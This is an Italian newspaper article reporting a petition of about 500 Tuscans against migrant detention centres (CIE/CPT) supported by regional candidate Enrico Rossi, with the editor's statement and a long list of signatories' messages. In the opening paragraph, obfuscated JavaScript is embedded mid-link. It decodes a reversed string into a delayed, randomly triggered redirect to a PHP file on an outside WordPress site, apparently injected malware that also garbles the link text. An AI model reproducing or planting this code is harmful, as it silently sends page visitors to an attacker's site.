NO AI CIE! 500 toscani scrivono a Enrico Rossi. Successo della petizione del nostro giornale.

image_pdfimage_print

A che serve organizzare il giorno della memoria se poi si aprono i lager per i migranti? Non possono esistere CIE “umani”: caro candidato, non copiare la destra!

Sono 500 i toscani e le toscane che hanno sottoscritto la petizione lanciata nei giorni scorsi dal nostro giornale “$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andidato-rossi/” mce_href=”../2010/01/28/no-ai-ciecpt-in-toscana-firma-anche-tu-ferma-il-candidato-rossi/” target=”_blank”>No ai Cie/Cpt in Toscana. Ferma il candidato del centro-sinistra Enrico Rossi!” dopo che quest’ultimo si è dichiarato favorevole alla loro apertura sul territorio regionale. Tanti i messaggi contro una politica razzista, sotto riportati integralmente, che nel nome della sicurezza nega i basilari diritti umani a una larga fetta di migranti presenti nel nostro paese.

“A Enrico Rossi è stato ricordato come i Centri di Identificazione ed Espulsione siano disumani ‘per natura’, essendo progettati per rinchiudere senza processo persone che non hanno commesso nessun reato, con la sola colpa di essere ‘irregolari’ – ha detto la direttrice del giornale Cecilia Stefani. Per la prima volta dal 1938, anno in cui furono varate le leggi razziali dal fascismo, si punisce la condizione, lo stato di una persona e non il comportamento. Per questo chiediamo al futuro presidente della Regione Toscana di “disobbedire” alla legge che istituisce i CIE e allo stesso tempo di resistere alla pressione del governo e di quella parte dell’opinione pubblica che vuole un centro in Toscana, come del resto ha fatto il presidente Martini fino ad oggi. Non vorremmo che la tanto decantata “discontinuità” politica rivendicata dal candidato finisse per colpire i più deboli e meno tutelati della società globale, di cui la Toscana e l’Italia non sono altro che un piccolo tassello. Se discontinuità deve essere, lo sia, ad esempio, nei comportamenti etici con cui parte della politica e delle amministrazioni governano il territorio, anche in Toscana”, ha concluso Cecilia Stefani riferendosi all’ennesimo scandalo urbanistico scoppiato in questi giorni nel Mugello.

Per chi volesse saperne di più, nei giorni scorsi Medici Senza Frontiere ha rilasciato il rapporto sullo stato dei CIE/CPT in Italia, unica organizzazione indipendente a trattare l’argomento. Ne viene fuori un quadro di degrado e di totale non rispetto dei diritti umani. Qui la sintesi e qui l’abstract del rapporto “Al di là del muro”.

Ecco i firmatari e i messaggi affidati ad Enrico Rossi.

–    Adriana Alberici    Cantieri Solidali Piagge
–    Adriano Del Rosso
–    alberto mega
–    Alberto Todaro         Questo è ciò che dice la Dichiarazione Universale dei Diritti Umani. Articolo 13 Ogni individuo ha diritto alla libertà di movimento e di residenza entro i confini di ogni Stato. Ogni individuo ha diritto di lasciare qualsiasi paese, incluso il proprio, e di ritornare nel proprio paese. Articolo 14 Ogni individuo ha il diritto di cercare e di godere in altri paesi asilo dalle persecuzioni.
–    aleandro biagianti
–    alessandra giusti    amnesty
–    Alessandra Mariani    Cantieri Sociali per Castelnuovo    Provo semplicemente ripugnanza per tutti coloro che osano dirsi ‘di sinistra’ e promuovono aberrazioni del genere, ormai totalmente appiattiti sulle logiche berlusconiane di potere e di ricerca del consenso nonché sulla bassa cultura leghista. Complimenti Ross, lei è peggio di loro perché ha la presunzione di presentarsi ‘diverso’ da loro.
–    Alessandra Pastore
–    ALESSANDRO BOCCHERO    Sportello per la pace   e Italia-Nicaragua (Livorno)
–    Alessandro Braggio
–    Alessandro Corsini
–    Alessandro Cristofaro
–    Alessandro De Angeli        Mai e poi mai un lager in Toscana! Vorrà dire che piuttosto che votare Rossi non andrò alle urne.
–    Alessandro Della Malva    P-Carc
–    Alessandro Murgia    Associazione Mondo Amico    I CIE/CPT sono strutture indegne di un Paese civile e inaccettabili per chiunque si dichiari seguace di Gesù. E’ stupido riempire l’Italia di Crocifissi se non ci accorgiamo che noi ora stiamo dalla parte dei carnefici. Da cinque secoli i Paesi ricchi saccheggiano le risorse umane, l’ambiente e le materie prime dei paesi poveri e per i nostri capitali non esistono frontiere. Non possiamo chiudere la porta in faccia alla moltitudine di disperati che noi stessi abbiamo creato. Iniziamo a restituire il maltolto e vedremo che nessuno abbandonerà la terra su cui è nato, se non per turismo
–    alessandro santoro    comunità di base delle piagge    Come sempre ed ora più che mai lottare insieme per evitare che si permetta la costruzione di un cie/cpt in toscana
–    Alessandro Tartoni        Gki italiani hanno memoria corta. Ricorda Rossi la scritta nei ristoranti svizzeri: “Vietato l’ingresso a cani e italiani”?
–    alessandro tassi        altro che “sinistra radicale”… ma dov’è la sinistra? In queso paese c’è soltanto destra e destra estrema!
–    alessia pesenti
–    alessio capezzuoli
–    Alessio Cecchini    Sinistra per Capannori
–    Alfonso Coletta
–    Alfonso Luciano    GASFREDIANO
–    Alidina Marchettini
–    Ambretta Falchi        Non si può pensare che non si debbano fare i CIE in Toscana e che invece altre regioni possano farli. Bisognerebbe intervenire perchè i CIE non siano tenuti come campi di prigionia per stranieri.
–    Amerigo R. Bigagli    Venti di Terra onlus
–    Andrea  Callaioli
–    andrea antonini
–    Andrea Calamai
–    andrea campolucci
–    andrea cortecci        via i cie/cpt dalla toscana!!!
–    Andrea Lapo Sartoris    SOCIALISMO RIVOLUZIONARIO    Dimostrazione lampante che la sinistra politica è l’altra faccia della destra politica: tutto è politica, tutto è potenzialmente oggetto di trattativa, anche la vita delle persone!
–    Andrea Mancini
–    andrea puggelli
–    Andrea Sorrentino
–    Andrea Trentini    Gruppo ambiente e nonviolenza
–    Andrea Valdambrini
–    Andrés Lasso        Rossi, fai qualcosa di sinistra!!
–    Anna Mannino
–    Anna Pandolfini
–    Anna Picciolini    Associazione X una sinistra unita e plurale
–    Annalisa Calcinai
–    annamaria sgarra
–    Antonella Alicervi
–    antonella cappè
–    antonella pieri
–    Antonello Nave    Altroteatro
–    Antonio Berti
–    Antonio Berti
–    Antonio Fiorentino
–    Antonio Mellini    Associazione Liberarsi    Adesione completa all’appello per la non istituzione anche in Toscana dei Cie/Cpt. E’ un elemento discriminante per il voto
–    antonio villanacci        per favore, basta razzismo.
–    arcangela margollicci
–    armandodevuono        La tradizione della toscana basata sul rispetto, l’accoglienza, la giustizia e  la resistenza, non può permettere che venga creata una struttura inumana come il cpt.
–    armida bandoni
–    ASSANE KEBE    associazione dei senegalesi    DICIAMO SEMPLICIEMENTE NO AI CIE/CPT NE IN TOSCANA NE DA ALTRE PARTE.
–    ASSOCIAZIONE   A.I.T ALVINO SANDRA    ASSOCIAZIONE     A.I.T   FIRENZE    ABBIAMO  PIACERE  ROSSI  PER  DONNE  O  TRANSESSUALI  FATTO MOLTO  ……………..  NON METTETETE PIU ETICHETTA  APPARTENENZA  PDL  NON SIAMO  POLITICHE   MA  WWWWWWWW   ROSSI   CONOSCE NOSTRE
–    Associazione Pantagruel    Associazione Pantagruel    Lo sà il candidato presidente Enrico Rossi che cosa è un CIE? E’ una struttura di detenzione peggiore del carcere nel quale quantomeno esiste una Magistratura di Sorveglianza. Nei CIE i detenuti sono esposti ad ognio arbitrio della vigilanza.
–    Associazione Solidarietà Proletaria        No ai Cie/Cpt né in Toscana, né altrove!
–    Barbara Carboni
–    barbara dini
–    barbara peruzzi
–    barbara zattoni        no no no
–    beatrice bernini    fondo etico
–    beatrice maurri
–    Beatrice Montini
–    Benedetto Femia    Sinistra Ecologia e Libertà
–    brunella trotti
–    Bruno Ferrari    PD – Lega Ambiente – CGIL
–    Camilla Bencini    Cospe    Non esistono cie umani
–    camilla passigli
–    cammelli annamaria        è una vergogna rincorrere la destra
–    carlo
–    Carmine Miccoli
–    carol wasserman    Fermiamo la Guerra-statunitnsi contro la guerra   Sono di origine statunitense e ebraica. Nel 1912 mio nonno immigrava negli stati uniti; nel 1913 mia nonna lo ha raggiunto con i suoi 4 figli.  Mia madre aveva 8 anni. Sono un’americana di prima generazione, un extracomunitaria con la cittadinanza Italiana. Come sarebbe finita la mia famiglia se la politica americana del primo novecento fosse sta guidata da un Enrico Rossi pronto a cedere ai razzisti e agli xenofobi? Speravo di più della Toscana.
–    carolina lombardini
–    Caterina Bertelli
–    Caterina Lusuardi    Osservatorio Civico Antimafie di RE    gli immigrati non sono nè problema nè risorsa sono persone con il diritto di poter andare per il mondo
–    Catia Farinelli
–    Cecilia Boninsegni
–    Cecilia Cambi        Nessun Cie/Cpt in Toscana
–    Cecilia Dell’Olio
–    Cecilia Stefani    l’Altracittà    Non faccia la sinistra ciò che fa la destra.
–    chiara baragatti
–    chiara giunti    associazione x sinistra unita e plurale    NO AI CIE, grandi piccoli concentrati o disseminati!!
–    chiara stinghi        In un mondo democratico e libero non possono esistere dei luoghi di reclusione per nessun uomo e la provenienza non può essere un pretesto per creare delle gerarchie.
–    Christian Surchi
–    Claudia D’Arrigo
–    Claudia De Venuto
–    claudia del rosso    Ass.ne Amani Nyayo
–    claudia marcolini    Partito dei CARC    Ben vengano queste iniziative, utilizzare ogni spazio che ci rimane per cpstringere le auotità a prendere soluzioni d’emeergenza per garantire una vita dignitosa ai lavoratori, migranti e non, e alle loro famiglie! Contro razzismo, fascismo e omofobia: ORA e SEMPRE RESISTENZA!
–    Claudio Calosi        Penso sia proprio il caso di fermarlo !!!!
–    Claudio Lombardi     Comitato Kurdistan Firenze
–    Claudio Pettinotti
–    Concetta Petriliggieri
–    consalvo fontani
–    Corrado Mauceri    Sinistra per la Costituzione
–    cosimo magnelli    Agesci Firenze 4°
–    Cosimo Paravano
–    Costanza Pera
–    Costanza Stoppioni
–    Cristiana Guccinelli        perchè è secondario che un cie sia organizzato più o meno bene. Nei confronti di prigioni illegittime bisogna saper dire no a prescindere da tutto, fino alla disobbedienza.
–    cristiano caria
–    Cristiano Lucchi
–    Cristina Calvanelli
–    Cristina Di Palma
–    cristina favini    ass.rosacanina    forse ha sbagliato partito e non se ne è accorco?dove sono coloro che rappresentano il popolo di menti e speranze che credono e lavorano per l’uguaglianza di diritti e la valorizzazione della biodiversità culturale? si guardi nel riflesso degli occhi di un migrante e si cerchi.
–    cristina galasso    Associazione Casa della donna, Pisa
–    cristina morcan    Federazione di sinistra    Sono contenta di firmare per Enrico Rossi.
–    cristina norcini
–    CRISTINA SGUANCI
–    Damiano Avinio
–    Daniela Benemei
–    daniela melotti    emergency
–    daniela misuri    comunità piagge    Mai e poi mai avrei pensato di trovarmi davanti alla necessità, all’urgenza, di firmare contro una decisione di questo genere. Quest’anno compirò cinquant’anni. E’ vero che da giovani si sogna chissà cosa a occhi aperti… ma così se ne approfittano! Che amarezza. Forza, però, andiamo avanti. E grazie a chi prende queste iniziative che ci permettono, senza troppa fatica, di aderire a questi appelli.
–    daniela mugelli
–    daniela poli
–    Daniele Fabbri        Se rossi vuole i cie/cpt che ci vada a vivere!
–    Daniele Gregori
–    Daniele Pagani
–    daniele pieri
–    daniele scapigliati        Primo Levi diceva che – quando si dice “non siamo tutti uguali”,”non tutti abbiamo gli stessi diritti”,”alcuni hanno diritti ed altri no”…. alla fine di questo c’è il Lager- ci siamo al lager! E questo PD vuole metterli anche in Toscana?
–    daniele vannetiello
–    daria morandi    partito umanista
–    Davide Migliorino
–    deanna sardi
–    Denise Pagano    movimento umanista
–    Diego Bernardi    Gruppo Volontari Accoglienza Immigrati    Già mi vergogno di essere italiano, non desidero affatto di vergognarmi di essere toscano.
–    dimitri rossellini
–    Domenico Mazzei
–    DOMENICO PONTILLO    rete lilliput
–    Domenico Rossi
–    Donata Carradori        ma perchè ?
–    Donatella Rovini    Sinistra Unita e Plurale    No ai C.I.E. senza se e senza ma. Facciamo piuttosto delle case di accoglienza per gli sgomberi sempre pi frequenti nei nostri comuni !
–    Duccio Tronci
–    elena barcelli
–    elena facco
–    Elena Miraglia    la comunità per lo sviluppo umano di firenze
–    Elena Pullara
–    Elena Romoli        No ai Cie/Cpt, nè qui ne da altre parti!
–    eleonora barbieri
no ai centri di concentramento in Toscana !
–    eleonora gnot    partito umanista     in questi giorni dove la regione toscana si fa promotrice di iniziative  dedicate al “giorno della memoria” per non “scordare” lo sterminio nazista contro gli ebrei, vedere nel 2010  un candidato  del PD  alle regionali prossime che si dichiara favorevole all’apertura di un CIE fa si che si continui a dare risposte politiche ai conflitti  sociali
a partire da logiche razziste e discriminatorie (che al mio palato hanno il sapore delle leggi razziali che hanno aperto la strada al successivo sterminio durante il regime nazista…) finchè si continuerà a dare risposte  a partire dalla paura, la disuguaglianza,  la  divisione, la separazione, la discriminazione e  l’intolleranza non si potrà costruire la base per una nuova civiltà basata sul riconoscimento dei  diritti umani,  l’accoglienza, la pace e la non violenza a partire dalle quali dare risposte  ed elaborare soluzioni degne per ogni essere umano .
–    elia pegollo    Centro culturale LA PIETRA VIVENTE    Appena rientrato dal Nord Kivu, dove la guerra , le cui radici profonde si chiamano DIAMANTI,ORO, COLTAN ETC.,  continua a mietere vittime innocenti, sento il bisogno di chiedere la più ampia solidarietà ed apertura nei confronti di chi ha bisogno del nostro aiuto per sopravvivere; considerando altresì che i nostri debiti verso il SUD del mondo non saranno mai interamente pagati, mi sembra logico pretendere almeno  dagli  uomini di sinistra, che saranno chiamati a governare la nostra regione , la loro  netta  contrarietà   a Cie/Cpt .L’umanità che soffre è davanti ai nostri occhi.
–    elisa nicoli
–    elisa patrizia frediani    Gruppo di solidarietà con il Kurdistan turco
–    Elsa Dini        Rispettiamo la persona e la sua dignità. Basta con i soprusi, l’egoismo e l’arroganza.
–    elsa luttazzi
–    Emanuele Palagi        Non è più possibile tollerare da parte della sinistra questo tipo di concessioni al pensiero,alle parole e,purtroppo,alle vie di fatto di una destra intollerante e fascista
–    Enrico Biso    comunista    Questo centrosinistra fa di tutto per far vincere le destre, non solo in campo elettorale, ma anche a livello culturale, urge una netta presa di distanza.
I cie sono barbarie del capitale.
–    enrico mazzeschi    —–    …… avevo sete e mi deste da bere. ero nudo e mi vestiste….
–    Enrico Sartoris    PD    Cie/Cpt = inciviltà e miopia politica
–    Erica De Lorenzo
–    Eros Tetti    per una cittadinzna attiva Bagno a ripoli
–    Ettore Bucci    Sinistra Per…
–    ezio Catacchio    Altre ragioni
–    Fabio Bernieri    Sinistra e Libertà Carrara
–    Fabio carnelli
–    Fabio Ceseri    Libera
–    Fabio Tatini
–    fabrizio bastianoni    italia nostra    Nel C.I.E infiliamoci il “signor” Rossi con tutta l’accozzaglia di mangiapane simili a lui.
–    Fabrizio Cherubini
–    Fabrizio Martini
–    Fabrizio Mazzoni    Amani Nyayo
–    Fabrizio Tinti    Comunità delle Piagge    Un candidato di sinistra (anche se il termine è fuori moda) dovrebbe avere il coraggio di dissentire pubblicamente di fronte ad una imposizione governativa e non tentare di spacciare per politicamente corretta una istituzione come i CIE. Poteva (anzi doveva)dire: HO LE MANI LEGATE. Può darsi che così facendo raccatti qualche consenso a destra ma ne ha persi tanti a sinistra. Su queste questioni non si può transigere
–    Federica Russo    Associazione socio-culturale D.E.A.
–    Federico Giberti
–    Federico Oliveri    Rifondazione Comunista    Queste proposte – e non solo queste – del candidato Rossi rendono impossibile ogni accordo di coalizione per le elezioni regionali. Solo opposizione e costruzione dell’alternativa di sinistra.
–    fernanda guarducci
–    ferruccio ughi
–    fiammetta benati    perUnaltracittà
–    Fiammetta Di Paola
–    Filippo Callegaro
–    Filippo Marranci    Ass.ne Cult.le “La leggera”    I Cie/Cpt sono una vergogna ovunque, spero che tutto questo prima o poi si rivolti contro chi li pensa, progetta, istituisce e desidera. Non mi appello alla vendetta, solo alla giustizia e all’umanità. F. M.
–    filippo martelli
–    Filippo Tronconi
–    Fiorella Bomè    ATTAC
–    fiorella bomé     attac chiantivaldelsa
–    Fiorella Nicosia
–    Flavio Coppola    COBAS
–    flavio gori
–    flora bisogno    cantiere di Critica Culturale ass. di promozione sociale
–    Floriana Raga     suore ausiliatrici
–    Franca Gianoni    Comitato San Salvi chi può
–    Francesca Baldi
–    Francesca Flosi
–    francesca moccagatta
–    Francesca Parra
–    Francesca Sarcoli
–    Francesca Testa    Emergency
–    Francesco Albanese
–    Francesco Andriola    unione degli studenti
–    francesco capacci
–    Francesco D’Antonio    cgil
–    Francesco Guidi
–    Francesco Pasqualetti        Gli uomini onesti sono tali indipendentemente dalla nazionalità, così come i delinquenti. La reclusione è accettabile solo per i secondi.
–    francesco pomicino
–    Franco BORGHI    LIBERA    L’ intenzione di Enrico ROSSI è assolutamente ignobile e si mette allo stesso livello miserevole dei Leghisti. Probabilemnte vuole raccattare voti dalla persone “perbene”.
–    Franco Bruni        non c’è bisogno di “centri di identificazione”   in Toscana
–    franco lombardo
–    fulvia alidori
–    FULVIO FIORENTINI
–    Fuori Binario    Periferie al Centro    Fermiamo il loro razzismo!!
–    Gabriele De Cecco
–    Gabriele Gatti    PRC, CGIL
–    Gabriele Nencioni
–    Gabriele Palloni    Ass. Etnie    Ma la legge regionale sull’immigrazione è diventata preistoria prima ancora di essere applicata? Grande il kaos nell’universo, ma anche la Toscana ci mette del suo!
–    gabriella grasso
–    gabriella mauri        abbiamo tutti bisogni di politiche e di risposte rivolte all’inclusione sociale
–    gabriella serani
–    Gallia Gabriella    Associazione Amicizia Italo-Palestinese Onlus
–    gennaro guida
–    giacomo cucignatto
–    giada catalano
–    giampaolo della monica        oltre a firmare questa petizione, invito fortemente le/gli aderenti a NON ANDARE A VOTARE, sopratutto, ma non solo, se nel programma del candidato ci sarà una proposta del genere.
–    gian luca garetti    perunaltracittà
–    Gianfranco Tomassini    Rete@sinistra    Chiediamo, in alternativa, strutture di prima accoglienza per rifugiati e richiedfenti asilo.
–    Gianluca Bertelli
–    Gianmaria Lenelli    Anpi giovani Massa
–    gianna castellucci        nonononononono a cie/cpt
–    Gianna Frilli        Enrico Rossi e la Giunta hanno fatto molte cose per garantire la sanità pubblica alle persone migranti nella nostra Regione. Sono però contraria ai centri /Lager di reclusione per i migranti in generale.Dovrebbero essere chiusi in tutta Italia. Non voglio che se ne aprano di nuovi. Auguro che troveremo valide e umane alternative che, dalla nostra Toscana, siano di esempio all’intero Paese.
–    Gianna Innocenti
–    Gianpaolo Cateni    Comitato Antifascista senese    STOP THE RACISM
SKINHEAD ANTIRAZZISTA
–    ginatassinari
–    Gino Buratti    Associazione Volontari Ascolto Accoglienza
–    gioia gamerra
–    Giorgio Carpi    CNMS
–    Giovanna Braschi
–    Giovanna Colomo        dalla sinistra (ma lo è ancora?) ci si aspetta una politica diversa da quella della destra e alleati: e se all’interno del PD facessero uno sforzo di memoria, cercando di ricordare quali erano, un tempo, i valori fondanti della sinistra, non certo la marginalizzazione o, peggio, il rifiuto di altri esseri umani?
Giovanna
–    GIOVANNI AGRESTI    COMUITA’ BASE LE PIAGGE
–    Giovanni Cresci    AGESCI    non esistono CPT/CIE in cui come vorrebbe rossi “vengano rispettati i criteri di umanità e di accoglienza”. Prima cambiare la legge sull’immigrazione!
–    Giovanni Giardina
–    Giulia Bartoli
–    Giulia Checcucci
–    Giulia Nicastro
–    giulietta stefani
–    Giulio Aldinucci
–    Giuseppe Marcocci    Africa Insieme    Semplicemente, una vergogna.
–    Giuseppe Marrani
–    Giuseppe Nava        Oggi, 2 febbraio, al Tg3 delle 19 si è visto un reportage impressionante sulle condizioni carcerarie e lesive dei diritti umani dei cosiddetti CIE (dove oltretuttoi migranti possono essere trattenuti fino a sei, diconsi sei mesi!). Speriamo che l’abbia visto anche il sig.Enrico Rossi, che, a quanto pare, fa il furbetto pensando di combattere la destra sul suo stesso terreno.
–    Giuseppe Racioppi
–    gloria frittelli aziz
–    Grazia Turchi    flc- cgil
–    graziano bruno    cgil-arci-sel    dico no a qualsiasi forma di carcere, malcelato sotto pseudo sigle di qualsiasi tipo. si alla vita e alla dignità di essa
–    Guido Cerri
–    helen ampt
–    Iacopo Zetti        Pensare che un centro di detenzione per persone che non hanno commesso nessun reato possa non essere una violazione dei diritti umani è un controsenso. Anche i nazisti pensavano di non violare diritti, semplicemente pensavano che ebrei e zingari non potessero averne in quanto non umani, inferiori.
Ottima idea continuare nella stessa linea.
–    ilaria agostini        né in Toscana, né altrove
–    Ilaria Pranzini
–    ilaria vietina    arpa
–    Irene Gherardotti
–    Irene Palmisano    ManiTese    Contro qualsiasi forma di esclusione, discriminazione e segregazione…purtroppo rispetto a queste tre problematiche ho l’impressione che l’Italia e la nostra Toscana sembrano andarci a braccetto…. I politici Italiani pensano che i problemi si risolvono semplicemente negandoli, eliminandoli dal punto di vista giuridico e legislativo, ignorano le conseguenze sociali, culturali ed economiche che ricadono sui cittadini. Dopo il secolo breve ci aspetta il Secolo Sciagurato!
–    Irene Rocchi
–    Isabella Horn    Fucina per la Nonviolenza,sezione fiorentina del Movimento Nonviolento
–    Isabella Pera
–    ivano bechini    rifondazione comunista    non sono convinto che sia una proposta realmente alternativa alla logica razzista Bossi Berlusconi Maroni. Senza scadere nello sciocco ultrasinistrismo m senza rincorrere le spinte xenofobe
–    Jacopo Menichetti    comunità di base delle Piagge
–    Jacopo Stefani
–    jacopo storni
–    Jason Nardi    Social Watch – Italia
–    John Gilbert     CGIL    Mai un CIE/CPT in Toscana,chiudiamoli in tutta l’Italia! Accoglienza non razzismo
–    Julio Monteiro Martins    Associzione Sagarana    In questo periodo difficile della storia di Italia, la Toscana, anche contrastando altre regioni del paese, dev’essere fedele alle sue tradizioni di libertà e di solidarietà.
–    laura barile
–    Laura Biasi
–    laura viciani
–    Lavinia Marchiani
–    lelia ghilardotti    Fuori Binario    Si può contrastare questa decisione solo attraverso proposte civili, ogni associazione porte la sua. Non basta dire No, attraverso la parola possiamo costruire quella giusta, questa non lo è stata mai ( ma non si impara dalla esperienza?)
–    Leo Piacentini    “Ci sia acqua ai due lati”    Vorrei capire una cosa: se un “senza documenti” (non sopporto la parola “clandestino”)viene scoperto in Toscana, cosa gli succede? Probabilmente viene inviato in un CIE da qualche altra parte in Italia. E noi toscani stiamo tranquilli, chi se ne frega se è un lager, ecc. Non sarebbe più serio accettare di avere anche qui un CIE, fatto e gestito secondo norme civili, sotto controllo democratico, come sembra volere la regione toscana? Mi pare una domanda legittima. O bisogna per forza essere contro, a prescindere?
–    leonardo bolognini    RdB – Perunaltracittà    sono contrario ad ogni forma di violenza silenziosa, ma sarebbe meglio trovare una giusta soluzione. Chiunque sia dalla parte di Rossi non ha capito il problema……..povero centrosinistra!!!
–    leonardo coppola    comunità di Romena
–    letizia debetto    legambiente
–    Letizia Galgani
–    letizia santoni    emergency
–    lfio Nicotra    Gruppo Federazione della Sinistra Consiglio provinciale Arezzo    Nell’ultima seduta del consiglio provinciale di Arezzo tutto il centrosinistr ha bocciato la mozione della Lega chiedeva la costruzionbe di un Cie/Cpt in Toscana.
Che facciamo quando lo propone la Lega votiamo contro e quando lo propone Rossi votiamo a favore? Fermiamo questa posizione demente!!!!!
–    LIANA BORGHI    GIARDINO DEI CILIEGI
–    licia isolani
–    lidia giannelli    consigliere pdci.prc    Domani, 5/2 verrà Salvadori ass. reg. all’immigrazione ad illustrarci la relativa legge regionale. non mi lascerò sfuggire l’occasione  per chiederli qual’è la relazione fra la legge ed i Cie, tra la legge e le ordinanze contro i poveracci emesse dal Sindaco Pd di Borgo san lorenzo. E pensare che mi sono presa di razzista perchè ho posto in consiglio comunale la questione di assegni sociali  non dovuti e percepiti da persone che qui, in italia ci avranni si è no trascorso 10 giorni l’anno ovviamente, ne conosco nomi e cognomi: la mia era una critica alla scaltrezza alla illegalità , eppure in  questo comune dove si spera di raccogliere consenso dagli immigrati, visto che il pd ha perso in due mandati quasi il 30%, sono stata accusata di razzismo, dalla maggioranza, ovviamnte. Non certo dai cittani italiani e stranieri on esti.!!!! lidia
–    linda fineschi
–    Lisabetta Mugnai
–    Lorenzo Ferrari    Ass. SUP Firenze
–    lorenzo guadagnucci    Giornalisti contro il razzismo
–    Lorenzo Lucioni
–    Lorenzo Nardi
–    Lorenzo Pandolfini
–    luca andreini        Enrico Rossi so che sei una persona valida e di sicuro non è scaturita dalla tua mente una cosa del genere,quindi come è ampiamente possibile RIPENSACI. La nostra è una regione tollerante: non smentiamoci.
–    Luca Grillandini    emergency-ronda carita’    Non si edificano carceri x persone innocenti….scappano da un incubo per entrare in un altro….
–    Luca Rocchi    PD  CAMAIORE    Non scendiamo a compromessi a favore del consenso.Le leggi razziali le abbiamo già avute in passato e la vergogna non può essere ancora dimenticata………
–    Lucchesi Fabio    ambiente e futuro
–    Lucia Castellucci    Attac
–    lucia chiaffi
–    lucia mazzeschi    le Piagge
–    Luciano Rossi
–    Luisa Ramasso    La Comunità per lo Sviluppo Umano    Per me i CIE sono una vergogna umana
–    Luisella Briamonte
–    mackay heather
–    Manuela Lembo
–    Manuele Putti    Coordinamento Antifascista Senese
–    marco arzilli        i clandestini dovrebbero essere puniti se fanno del male a qualcuno, non in quanto clandestini
–    Marco Bartalucci
–    marco bechini    Ass.ne Amani Nyayo
–    Marco Catellacci
–    Marco Dall’Agnola
–    Marco Giovannetti
–    Marco Intini    Partito Umanista
–    Marco Milani
–    MARCO ROCCHI
–    Marco Sodi
–    Marco Venturi
–    Maria Assunta Basagni
–    Maria Beni
–    Maria Chiara Manetti    Comunità delle Piagge
–    Maria Cristina Tortorelli    Sinistra per… – Sinistra Ecologia Libertà
–    Maria Marzapane    Emergency
–    Maria Patrelli Campagnano    Gas    No a qualsiasi lager= NO a Enrico Rossi
–    Maria Rita Mancaniello        Ritengo che le politiche per l’immigrazione in una Regione come la Toscana possano mirare alla possibilità per tutti di potersi sentire cittadini del mondo e di vivere le opportunità perchè questo si realizzi. Senza ideali l’uomo è perso nella notte del niente. E credo che, quando questi guidano le azioni, ci siano opportunità molto più rispettose della persona (che rimane tale da qualunque parte del mondo provenga) e più adeguate alla società complessa, dei CIE per gestire un fenomeno così delicato.
–    marialaura galante
–    Mariangela Sirca    cittadina    basta Rossi, basta verdi (lega), SI genere umano (razza,  per capirci con questi disumani)
–    Marianna Dini
–    mariapia  passigli    redazione Fuori Binario
–    mariateresa bertoldi
–    MARIE HELENE BUGGE
–    mariella pala    le mafalde
–    mariella stefanoni
–    Marina Carli    Equipegas    La solidarietà verso gli immigrati certo non passa per i Cie/Cpt che devono essere aboliti, e non realizzati dei nuovi, utilizzando anche volontari.
E’ una vergogna
–    Marina Coppola        E’ proprio inutile continuare a manifestare dopo tanti anni per il “Giorno della memoria”…
–    Marina Sartor    Attac    NON SI PUO PROMUOVERE LA GIORNATA DELLA MEMORIA SE POI SI COSTRUISCONO I LAGER.
–    Mario Ciancarella    cane sciolto    I CPT, pensati e organizzati per prima haime’ dalla sinistra, hanno una sola funzione: deresponsabilizzare i potenti dal loro compito primario di garantire la sicurezza democratica del proprio Paese (in cui la presunzione di innocenza e’ prevalente, e la verifica per la repressione deve avvenire solo in flagranza di reato o a reato commesso), per rifugiarsi in una classica idea di sicurezza totalitaria (in cui si attribuisce pregiudizialmente ad un qualsiasi gruppo sociale una potenziale pericolosita’ al fine di reprimerla preventivamente sottraendosi ad ogni sindacato di legittimita’). E’ dunque la peggiore deriva di un sistema che voglia dirsi democratico, e ancor piu’ del nostro fondato sulla Costituzione nata dalla Resistenza e dalla Lotta di Liberazione dal NaziFascismo). Ogni espressione di antagonismo a questa deriva, ancor piu’ quando essa venga proposta da menti addormentat e della sinistra ed ubriacate dalla cultura della destra xenofoba, razzista, ladrona ed antidemocratica, e’ da promuovere ed appoggiare senza se e senza ma.
–    mario mugnai
–    mario pesenti
–    mario ricci
–    Mark Roberts    chiesa cattolica
–    Marta Benettin
–    Martina Burberi
–    Martina Gnan
–    massimiliano valentini        è veramente scandaloso che da persone che si dichiarano di sinistra maturino espressioni neonaziste
–    Massimo Torelli
–    Massimo Viani
–    Matteo Bortolon
–    Matteo Dartagnan    Sinistra Per…
–    Mattia Laconca    Confederazione Unitaria di Base – CUB
–    Maurizio Baldini    Tra Terra e Cielo
–    Maurizio De Zordo    PerUnaltracittà
–    Maurizio Sarcoli    Comunità di base le Piagge
–    Mauro Ricciardi        NO AI CPT/CIE
–    Michele Antognoli    GASVecchiano
–    Michele Bracci
–    Michèle Fantoli
–    Michele Musicco        Basta con questi orrori!!!
–    Mirka Faganello
–    monica raspi        non ci sono parole, no e basta
–    monica uliana
–    montse framis
–    Moreno
–    movimento di lotta per la casa firenze        ogni commento è inutile
–    Murar Bilal    Società interculturale    No ai CIE né in Toscana né da nessuna parte!
–    Nancy Bailey    Statunitensi contro la guerra
–    Nando Musicco
–    Nello Venturini    C.A.I.   e  G.A.E.V.    Sono pienamente daccordo a fermare questa scelta.
–    Nicola Cavazzuti        No ai CIE, no agli inceneritori, no alla privatizzazione dell’acqua, non allo sviluppismo.
–    nicola fasolino
–    nicola moscardi    cipì- collettivo insegnanti precari/e e inoccupati/e
–    Nicolas du Liege    Attac Chiantivaldelsa
–    Nicoletta Anna De Angelis    SEL Prato – CGIL Prato    Noi “forse” siamo di sinistra.
–    nicoletta folliero
–    nima sharmahd
–    nora toccafondi    SEL prato e cgil
–    Norma Bertullacelli
–    Olivia Braschi
–    olivia bruno
–    orietta mendella        l’unità viene sui fatti, nella condivisione dei dirirtti civili e la democrazia. uniamoci sempre di più
